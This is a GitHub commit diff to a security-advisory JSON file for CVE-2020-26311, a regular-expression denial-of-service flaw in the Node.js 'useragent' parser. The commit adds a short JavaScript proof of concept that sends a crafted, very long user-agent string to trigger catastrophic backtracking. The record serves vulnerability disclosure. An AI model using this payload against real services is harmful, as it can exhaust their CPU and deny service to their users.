Skip to content

Commit 893b6f9

Browse files
1 parent 741e62a commit 893b6f9

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

advisories/github-reviewed/2024/10/GHSA-mgfv-m47x-4wqp/GHSA-mgfv-m47x-4wqp.json

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,13 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-mgfv-m47x-4wqp",
4-
"modified": "2024-10-30T19:03:27Z",
4+
"modified": "2025-09-03T15:17:53Z",
55
"published": "2024-10-26T21:30:47Z",
66
"aliases": [
77
"CVE-2020-26311"
88
],
99
"summary": "useragent Regular Expression Denial of Service vulnerability",
10-
"details": "Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).",
10+
"details": "Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).\n\n## PoC\n```js\nasync function exploit() {\n const useragent = require(\\\"useragent\\\");\n\n // Create a malicious user-agent that leads to excessive backtracking\n const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';\n\n // Parse the malicious user-agent\n const agent = useragent.parse(maliciousUserAgent);\n\n // Call the toString method to trigger the vulnerability\n const result = await agent.device.toString();\n console.log(result);\n}\n\nawait exploit();\n```",
1111
"severity": [
1212
{
1313
"type": "CVSS_V3",

0 commit comments

Comments
 (0)